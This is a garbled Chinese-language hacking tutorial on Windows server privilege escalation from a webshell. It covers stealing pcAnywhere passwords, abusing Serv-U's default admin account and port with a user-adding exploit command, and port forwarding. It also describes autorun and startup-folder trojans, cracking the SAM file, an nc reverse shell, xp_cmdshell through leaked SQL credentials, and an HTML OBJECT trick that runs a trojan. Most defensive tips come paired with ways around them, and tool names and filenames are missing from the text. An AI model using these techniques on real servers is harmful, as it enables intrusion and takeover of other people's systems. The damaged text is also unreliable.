版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)
文檔簡介
1、對服務(wù)器進行提權(quán)的方法文章錄入:責任編輯:84【字體:小大】現(xiàn)在可以說網(wǎng)絡(luò)管理員對服務(wù)器的設(shè)置是越來越BT,但BT的同時,也有黑客朋友們對服務(wù)器的不斷的測試,在測試中往往獲取最低的guest權(quán)限是簡單的,像我們在入侵網(wǎng)站過程中,獲取webshell是簡單的,但是當由webshell的guest權(quán)限向system權(quán)限提升時卻往往是止步不前。所以我有想寫這樣一篇文章的想法,但是在思考的過程中,又不得不承認,方法是不斷的探索中出來的,方法更是有常規(guī)的也有另辟蹊徑的。下面就做一些簡單的介紹,對提權(quán)的方法進行一些介紹,同時也希望在更多朋友的不斷回復中能夠豐富我們的方法。首先要說明的是,過早的一些漏洞我們
2、就不再多說了,只說一些現(xiàn)在可以見到的吧。還有就是本文的題目是webshell下的服務(wù)器提權(quán)方法。下面我們就進入主題,對webshell的提權(quán)方法!首先我們要明確的是,提權(quán)一般是依靠主機所開通的服務(wù),利用服務(wù)存在的漏洞和管理員設(shè)置的疏忽進行提權(quán)的,不過也不排除一些SB的管理員對服務(wù)器設(shè)置的似乎沒有“穿衣服.下面就是針對一些常見的服務(wù)進行的提權(quán)方法。在獲取webshell后,我們常見的是看一下系統(tǒng)的服務(wù),查看服務(wù)可以通過利用掃描器對服務(wù)器ip進行掃描,或是在webshell中有執(zhí)行dos命令時查看netstart來查看主機所開放的服務(wù)。首先我們說一下從簡單的開始說起:的提權(quán)方法pcanywhere
3、軟件我想大家都了解,為什么將它放在首位就是因為讀取密碼后直接連接就可以了,如果對方主機在開通了pcanywhere的服務(wù)端的話,我們看能否跳轉(zhuǎn)到這個目錄,如果行那就最好了,直接下載它的CIF文件,然后使用pcanywhere的密碼讀取器得到pcAnywhere密碼,然后使用pcanywhere登陸即可!接下來就是可視化操作了。提權(quán)方法Serv-u可以說是網(wǎng)絡(luò)上比較火的一款FTP服務(wù)器軟件,有許多像我這樣的小黑們都是看系統(tǒng)服務(wù)中是否有Serv-u的系統(tǒng)進程來進行提權(quán)的。Serv-u的提權(quán)方法針對不同的版本也有不同的方法,這里我們就列舉一二,可能不是很全,但在其他網(wǎng)友的回復中能夠不斷的補充吧!本地
4、提權(quán):serv-U本地提權(quán)一般是利用溢出程序?qū)erv-u的設(shè)置上的缺陷進行添加超級賬戶的功效。例如Xiaolu寫的就是利用sevr-u的默認管理端口,管理員賬號和密碼進行提權(quán)的,默認本地管理端口是:43958,默認管理員:LocalAdministrator,默認密碼:lk;0P,這是集成在Serv-u內(nèi)部的,可以以Guest權(quán)限來進行連接,對Serv-u進行管理,利用本地提權(quán)的關(guān)鍵就是尋找服務(wù)器文件目錄中的everyone權(quán)限目錄,下面我給大家列舉些常見的everyone權(quán)限目錄:是erveryone完全控制,很多時候沒作限制,把提升權(quán)限的工具上傳上去,然后執(zhí)行c:prel很多時候data
5、目錄不行,試試這個很多主機都是erveryone完全控制!c:mysql(如果服務(wù)器支持PHP)c:PHP(如果服務(wù)器支持PHP)上面一些目錄就是常見的,不過也不排除一些特殊的,像江民的kv2004對文件夾的權(quán)限設(shè)置就不是很嚴格的。不過針對本地提權(quán)是可以防范的,下面是我在xiaolu的文章中節(jié)選的:防止辦法和對策:一般防止方法:設(shè)置目錄權(quán)限,通過去掉Web目錄iusr用戶的執(zhí)行權(quán)限來防止使用Webshell來運行Exp程序。對策:這種方法有一定的局限性,需要設(shè)置的目錄很多,不能有一點疏漏,比如我就發(fā)現(xiàn)很多虛擬主機在C:DocumentsandSettingsAllUsersDocuments目
6、錄以及下邊幾個子目錄Documents沒有設(shè)置權(quán)限,導致可以在這個目錄上傳并運行Exp,這種目錄還有x:php,x:perl等,因為這種目錄都是everyone完全控制的。有些主機還支持php,pl,aspx等,這簡直就是服務(wù)器的Serv-U災難,1A,運行程序更加方便。高級一點的防止辦法:修改Serv-u管理端口,用Ultraedit打開查找B6AB(43958的16進制),替換成H己定義的端口比如3930(12345),打開找到最后一個B6AB替換成3930(12345),啟動Serv-u,現(xiàn)在本地管理端口就成了12345T:TCPLISTENING對策:對付這種也很簡單,netstat-
7、an,就能看到端口了,有人說netstat無法運行,其實你再上傳個到可執(zhí)行目錄運行就ok了,然后修改一下Exp編譯,上傳運行就好了,我修改了一個可以自定義端口的Exp,運行格式:USAGE:portcommand”Example:43958"netuserxlxiaoxue/add”更高級的防止辦法:修改管理員名和密碼,用Ultraedit打開查找Ascii:LocalAdministrator,和lk;0P,修改成等長度的其它字符就可以了,也一樣處理。對策:這下默認的管理員連接不上了,還有辦法么嘿嘿,有的管理員安裝Serv-u都是使用默認目錄C:ProgramFilesServ-U
8、安裝,這個目錄雖然不能寫,也不能修改,但是默認iusr是可以讀的,我們可以用webshell來下載,用Ultraedit打開分析一下,Serv-U的帳號密碼就到手了,修改Exp編譯上傳運行,我們又勝利了。終極防御:a.設(shè)置好目錄權(quán)限,不要疏忽大意;最好不要使用默認安裝路徑,設(shè)置Serv-U目錄的權(quán)限,只有管理員才能訪問;c.用我介紹的辦法修改Serv-U的默認管理員名字和密碼,喜歡的話端口也可以改掉。管理端口定向轉(zhuǎn)發(fā)法:這里需要使用的工具是我們要知道Serv-u默認本地管理端口是:43958,這個是只允許本地進行登陸和管理的,那么我們就想能不能通過端口轉(zhuǎn)向來遠程管理呢所以我們用到,首先是將上傳
9、至服務(wù)器中,然后再cmd下執(zhí)行-V-112345-r43958這里要說明的是,這段字符的意思是當訪問12345端口時就會自動轉(zhuǎn)向43958端口,也就是serv-u的管理端口所以我們在本地安裝一個Serv-u,新建一個服務(wù)器,填入對方IP,user:LocalAdministratorpass:#l$ak#.lk;0P連接上后你就可以管理他的Serv-u了,剩下的操作就是執(zhí)行上面提到的方法了!Serv-U的方法我就總結(jié)出這幾個來,可能還有其他的方法我沒有看到吧不過個人認為關(guān)鍵還是本地溢出漏洞的應(yīng)用要比較多一些,所以網(wǎng)上也常常出現(xiàn)serv-u的本機溢出程序不同版本的更是層出不窮,前一段時間針對的修
10、改了默認管理員賬號和密碼的相關(guān)文章還請大家參照校園黑客聯(lián)盟的小魚修煉中的文章。Serv-U的提權(quán)文章就暫時先總結(jié)到這里,有更好的方法還請大家回復!方法:這種方法也可以說是比較古老的方法,最初應(yīng)該是從光盤自動播放中尋找到的靈感吧不進行細說,給出格式即可制作一個文件.內(nèi)容如下AutoRunopen=為木馬程序,與放在同一目錄下破解方法:進入C:WINNTsystem32config下載他的SAM文件用1c等破解工具破解。5.相關(guān)腳本提權(quán)方法:前面的serv-u的ftp提權(quán)中提過的vbs這里再說下.進入c:DocumentsandSettingsAll開始菜單程序啟動寫入bat或vbs文件。這種方法
11、也是屬于守株待兔類的,只有在對方主機重起以后才可以達到目的。的反彈提權(quán):這里就要說NC的相關(guān)用法了,如果在對方服務(wù)器中有足夠的權(quán)限執(zhí)行nc的話就好了,把它反彈到自己的電腦上,你就可以進行相關(guān)操作了!瑞士軍刀具體方法不多說,給出格式,如下:server:nc-eip1234client:nc-1-p1234等asp文件中泄漏SQL帳戶密碼方法:這種方法說起來應(yīng)該算是比較僥幸的方法。曾經(jīng)馬俊和我說過一次,原來沒有太在意,現(xiàn)在還真的感覺有些好用了,找到賬號密碼和數(shù)據(jù)庫名在對方?jīng)]有刪除xp_cmdshell條件下用sql連接工具連接即,連接上后就可以輸入你想要的CMD命令了。的相關(guān)提權(quán):VNC也是一個
12、類似pcanywhere的遠程管理軟件,在linux應(yīng)用廣泛,曾經(jīng)在看臺灣的一些服務(wù)器中有很多使用VNC的,方法也是我在網(wǎng)絡(luò)中學到的,不過在應(yīng)用中就成功過一次,比較郁悶!方法就轉(zhuǎn)載一下吧,網(wǎng)址:Article/HTML/還有要補充的就是vnc是可以反向連接的,這個方法我沒有試過,只是曾經(jīng)看影子做過一個視頻動畫。與方法。(此方法是在網(wǎng)絡(luò)看到的)方法如下:首先建立一個文件夾,進入,在空白處點右鍵,選擇“自定義文件夾”一直下點,默認即可。完成后,你就會看到在此目錄下多了兩個名為Foldersetting的文件架與的文件,如果看不到,就把顯示所有文件給選上,然后我們在Foldersetting目錄下找到文件,記事本打開,在任意地方加入以下代碼:(OBJECTID="RUNIT”WIDTH=0HEIGHT=OTYPE=app1ication/x-o1eobject”CODEBASE二木馬名"></OBJECT>然后你將你的木馬文件放在Foldersetting目錄下,把此目錄與一起上傳到對方任意一個目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執(zhí)行了我們的木馬,此方法也屬于類似autorun的守株待兔方法。10.替換服務(wù)提權(quán):我認為比較
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權(quán)或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025年全球及中國法律領(lǐng)域的生成式AI行業(yè)頭部企業(yè)市場占有率及排名調(diào)研報告
- 2025年全球及中國單一材質(zhì)包裝行業(yè)頭部企業(yè)市場占有率及排名調(diào)研報告
- 二零二五年度儲罐租賃與倉儲信息化建設(shè)合同4篇
- 二零二五年度圖書音像產(chǎn)品促銷協(xié)議4篇
- 網(wǎng)絡(luò)運維居間代理提成協(xié)議
- 汽車銷售居間合同意向書
- 木材行業(yè)解除居間合同
- 2025年中國低溫等離子滅菌器行業(yè)市場發(fā)展現(xiàn)狀及投資方向研究報告
- 高端醫(yī)療設(shè)備采購合同書
- 水資源保護工程采購合同
- JB-T 8532-2023 脈沖噴吹類袋式除塵器
- 深圳小學英語單詞表(中英文)
- 護理質(zhì)量反饋內(nèi)容
- 山東省濟寧市2023年中考數(shù)學試題(附真題答案)
- 抖音搜索用戶分析報告
- 板帶生產(chǎn)工藝熱連軋帶鋼生產(chǎn)
- 鉆孔灌注樁技術(shù)規(guī)范
- 2023-2024學年北師大版必修二unit 5 humans and nature lesson 3 Race to the pole 教學設(shè)計
- 供貨進度計劃
- 國際尿失禁咨詢委員會尿失禁問卷表
- 彌漫大B細胞淋巴瘤護理查房
評論
0/150
提交評論